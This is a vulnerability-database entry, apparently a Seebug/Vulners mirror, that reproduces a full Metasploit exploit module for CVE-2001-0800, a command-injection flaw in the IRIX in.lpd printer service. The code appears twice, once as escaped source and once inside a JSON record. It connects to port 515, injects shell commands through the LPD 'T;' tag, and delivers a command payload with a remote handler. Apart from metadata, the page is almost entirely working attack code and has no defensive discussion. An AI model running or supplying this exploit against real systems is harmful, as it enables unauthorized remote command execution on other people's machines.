Search...

Irix LPD tagprinter - Command Execution

2014-07-01T00:00:00

ID SSV:67036
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require &#39;msf/core&#39;


class Metasploit3 &#60; Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			&#39;Name&#39;           =&#62; &#39;Irix LPD tagprinter Command Execution&#39;,
			&#39;Description&#39;    =&#62; %q{
				This module exploits an arbitrary command execution flaw in
				the in.lpd service shipped with all versions of Irix.		
			},
			&#39;Author&#39;         =&#62; [ &#39;optyx&#39;, &#39;hdm&#39; ],
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Version&#39;        =&#62; &#39;$Revision$&#39;,
			&#39;References&#39;     =&#62;
				[
					[&#39;CVE&#39;, &#39;2001-0800&#39;],
					[&#39;OSVDB&#39;, &#39;8573&#39;],
					[&#39;URL&#39;,   &#39;http://www.lsd-pl.net/code/IRIX/irx_lpsched.c&#39;],
				],
			&#39;Privileged&#39;     =&#62; false,
			&#39;Platform&#39;       =&#62; [&#39;unix&#39;, &#39;irix&#39;],
			&#39;Arch&#39;           =&#62; ARCH_CMD,
			&#39;Payload&#39;        =&#62;
				{
					&#39;Space&#39;       =&#62; 512,
					&#39;DisableNops&#39; =&#62; true,
					&#39;Compat&#39;      =&#62;
						{
							&#39;PayloadType&#39; =&#62; &#39;cmd&#39;,
							&#39;RequiredCmd&#39; =&#62; &#39;generic telnet&#39;,
						}
				},		
			&#39;Targets&#39;        =&#62; 
				[
					[ &#39;Automatic Target&#39;, { }]
				],
			&#39;DisclosureDate&#39; =&#62; &#39;Sep 01 2001&#39;,
			&#39;DefaultTarget&#39; =&#62; 0))
			
			register_options(
				[
					Opt::RPORT(515)
				], self.class)
	end

	def check
		connect
		sock.put(&#34;T;uname -a;\n&#34;)
		resp = sock.get_once
		disconnect
		
		if (resp =~ /IRIX/)
			print_status(&#34;Response: #{resp.strip}&#34;)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end
	
	def exploit
		connect
		sock.put(&#34;T;#{payload.encoded};\n&#34;)
		handler
		print_status(&#34;Payload: #{payload.encoded}&#34;)
	end

end

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-67036", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Irix LPD tagprinter - Command Execution", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-67036", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n ##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'Irix LPD tagprinter Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits an arbitrary command execution flaw in\r\n\t\t\t\tthe in.lpd service shipped with all versions of Irix.\t\t\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'optyx', 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2001-0800'],\r\n\t\t\t\t\t['OSVDB', '8573'],\r\n\t\t\t\t\t['URL', 'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Platform' => ['unix', 'irix'],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic telnet',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\t\t\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic Target', { }]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Sep 01 2001',\r\n\t\t\t'DefaultTarget' => 0))\r\n\t\t\t\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOpt::RPORT(515)\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tconnect\r\n\t\tsock.put("T;uname -a;\\n")\r\n\t\tresp = sock.get_once\r\n\t\tdisconnect\r\n\t\t\r\n\t\tif (resp =~ /IRIX/)\r\n\t\t\tprint_status("Response: #{resp.strip}")\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\t\r\n\tdef exploit\r\n\t\tconnect\r\n\t\tsock.put("T;#{payload.encoded};\\n")\r\n\t\thandler\r\n\t\tprint_status("Payload: #{payload.encoded}")\r\n\tend\r\n\r\nend\r\n\n ", "id": "SSV:67036", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T16:55:54", "reporter": "Root", "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2017-11-19T16:55:54", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T16:55:54", "rev": 2}, "vulnersScore": 0.3}, "references": [], "immutableFields": []}